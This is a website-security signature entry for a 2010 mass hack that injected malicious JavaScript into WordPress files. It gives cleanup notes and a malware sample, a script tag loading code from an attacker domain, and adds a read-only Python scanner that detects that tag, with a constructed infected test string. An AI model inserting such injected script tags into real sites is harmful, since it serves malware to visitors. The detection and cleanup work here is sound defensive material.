SiteCheck Signatures


malware-entry-mwrks2

Description: Code used to insert malicious JavaScript on sites
hosted at Rackspace and Mediatemple. It was part of a mass hack that affected
a good number of sites (especially at Rackspace).

Loads malware from:
And other domains.

Affecting: WordPress sites hosted at Rackspace and Mediatemple (maybe other
hosting companies as well).

Clean up and details: You have to remove the injected code, which is generally
present at the bottom of every .php, .html or .js file (mass added by the attacker).

Links:
http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/

Malware sample:

< script src = http:// azure.smartenergymodel. com /js/jquery.min.js>
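
A read-only check to support the clean-up step above, as an added example that is not SiteCheck's own code: it inspects the tail of each .php, .html and .js file for a script tag whose source host is on a watchlist. The watchlist is seeded only with the domain from the malware sample on this page, the function names are hypothetical, and the sample inputs are constructed.

```python
import os
import re

# Assumption: watchlist seeded with the domain from this page's malware sample;
# extend it with the other domains your own investigation turns up.
WATCH_DOMAINS = {"smartenergymodel.com"}
EXTENSIONS = (".php", ".html", ".js")
TAIL_CHARS = 1024  # the entry says the code sits at the bottom of the file

# <script src=...> with optional quotes; \s* tolerates the spacing seen in the sample.
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?\s*https?\s*:\s*/\s*/\s*([^\"'>/]+)",
    re.IGNORECASE,
)

def trailing_injection_hosts(text, watch=WATCH_DOMAINS):
    """Return watched hosts referenced by <script src> tags in the file's tail."""
    hits = []
    for m in SCRIPT_SRC.finditer(text[-TAIL_CHARS:]):
        # Drop stray whitespace and any port before comparing the host name.
        host = re.sub(r"\s+", "", m.group(1)).lower().split(":")[0]
        if any(host == d or host.endswith("." + d) for d in watch):
            hits.append(host)
    return hits

def scan_tree(root, watch=WATCH_DOMAINS):
    """Walk root and map each affected file path to the hosts found in its tail."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hosts = trailing_injection_hosts(fh.read(), watch)
            if hosts:
                report[path] = hosts
    return report

# Constructed sample inputs (not real site files).
INFECTED = ("<?php get_footer(); ?>\n"
            "<script src=http://azure.smartenergymodel.com/js/jquery.min.js></script>")
CLEAN = "<html><script src='/wp-includes/js/jquery/jquery.js'></script></html>"

if __name__ == "__main__":
    print(trailing_injection_hosts(INFECTED))
    print(trailing_injection_hosts(CLEAN))
```

The scan only reports; review each flagged file before removing the trailing tag.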